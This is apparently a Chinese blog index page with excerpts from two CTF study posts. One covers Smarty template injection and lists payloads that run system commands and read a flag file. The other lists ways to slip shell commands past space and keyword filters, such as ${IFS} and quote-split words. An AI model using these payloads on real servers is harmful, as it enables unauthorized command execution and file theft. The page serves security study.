会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
ZpHome
博客园
首页
新随笔
联系
订阅
管理
2025年6月12日
smarty模板注入
摘要: 前言: 1.常用payload{if phpinfo()}{/if}{if system('ls')}{/if}{if readfile('/flag')}{/if} {if show_source('/flag')}{/if}{if system('cat ../../../flag')}{/if
阅读全文
posted @ 2025-06-12 10:53 百年沧桑
阅读(96)
评论(0)
推荐(0)
2023年3月22日
ctf-文件执行漏洞(绕过)
摘要: 考察知识点: 文件执行漏洞 空格特殊字符、flag字符绕过空格绕过 ${IFS} ${IFS}$1 $IFS$1 <和<> {cat,flag} %20替换 %0a (换行) %0d (回车) %09 (tab黑名单(关键字)绕过单引号、双引号绕过:c"at"t fl''ag反斜线绕过:ca\t f
阅读全文
posted @ 2023-03-22 22:12 百年沧桑
阅读(79)
评论(0)
推荐(0)
公告